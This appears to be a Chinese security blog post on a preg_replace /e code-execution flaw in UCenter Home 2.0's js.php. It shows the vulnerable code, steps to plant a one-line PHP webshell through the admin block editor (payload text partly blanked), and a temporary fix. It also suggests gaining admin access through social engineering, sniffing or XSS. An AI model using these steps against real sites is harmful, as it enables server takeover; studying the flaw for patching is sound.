DZ公司的-Uchome <=2.0 后台GetWebShell 漏洞

[全站通告] 想快速节省您的时间并可接受付费的朋友,可扫右边二维码加博主微信-非诚勿扰!

漏洞介绍:uchome<=2.0的程序中js.php文件存在代码执行漏洞,原因是正则匹配时引号使用不当,导致可以任意提交并执行PHP代码。 Php中单引号与双引号是有区别的: " "双引号里面的字段会经过编译器解释,然后再当作HTML代码输出。 ' '单引号里面的不进行解释,直接输出。 这里正则匹配后的\\2在双引号里,导致了代码可以执行。 Js.php 问题代码如下 [code] include template("data/blocktpl/$id"); $obcontent = ob_get_contents(); obclean(); $s = array("/(\r|\n)/", "/\.+?\<\/div\>/is", "/\s+(href|src)=\"(.+?)\"/ie");
$r = array("\n", '', 'js_mkurl("\\1", "\\2")');//代码执行

$content = '';
if($obcontent) {
$obcontent = preg_replace($s, $r, $obcontent);
$lines = explode("\n", $obcontent);
foreach ($lines as $line) {
$line = addcslashes(trim($line), '/\'\\');
$content .= "document.writeln('$line');\n";
}
} else {
$content .= "document.writeln('NO DATA')";
}

[/code]
测试环境:
系统环境:Windows 2003 + IIS + PHP 5.2.9-2 + Mysql 5.0.67
程序环境:Ucenter Home 2.0(官方最新) + Ucenter 1.5(官方最新)

测试方法:

首先我在本地安装了一个全新的uchome.。这个漏洞的前提是首先拿到后台权限。你可以通过社工、旁注、嗅探、Xss 等手段拿到管理员密码并进入后台。
接着打开admincp.php?ac=block&op=add,选择第一个添加一个模块。填上模板名称、其他默认即可。然后提交。如下图

接着在数据显示Html代码处填入如下代码然后提交
[code]
a
加密内容为fputs(fopen('data/a.php','w'),'');

保存后检查一下ID,如果ID是1,则访问一下js.php?id=1

则在data目录下生成a.php一句话木马,密码是cmd

我这里ID是2 所以我访问 js.php?id=2

访问后data 目录下多出了一个a.php

这就是我们的一句话。连接试试

结果显示.漏洞确实存在并能执行任意PHP代码。。。已经成功得到一个webshelll

漏洞修补:目前官方暂无补丁临时修补方法如下

$r = array("\n", '', 'js_mkurl("\\1", "\\2")');
替换为
$r = array("\n", '', "js_mkurl('\\1', '\\2')");

[/code]

问题未解决?付费解决问题加Q或微信 2589053300 (即Q号又微信号)右上方扫一扫可加博主微信

所写所说,是心之所感,思之所悟,行之所得;文当无敷衍,落笔求简洁。 以所舍,求所获;有所依,方所成!

支付宝赞助
微信赞助

免责声明,若由于商用引起版权纠纷,一切责任均由使用者承担。

您必须遵守我们的协议,如您下载该资源,行为将被视为对《免责声明》全部内容的认可->联系老梁投诉资源
LaoLiang.Net部分资源来自互联网收集,仅供用于学习和交流,请勿用于商业用途。如有侵权、不妥之处,请联系站长并出示版权证明以便删除。 敬请谅解! 侵权删帖/违法举报/投稿等事物联系邮箱:service@laoliang.net
意在交流学习,欢迎赞赏评论,如有谬误,请联系指正;转载请注明出处: » DZ公司的-Uchome <=2.0 后台GetWebShell 漏洞

发表回复

本站承接,网站推广(SEM,SEO);软件安装与调试;服务器或网络推荐及配置;APP开发与维护;网站开发修改及维护; 各财务软件安装调试及注册服务(金蝶,用友,管家婆,速达,星宇等);同时也有客户管理系统,人力资源,超市POS,医药管理等;

立即查看 了解详情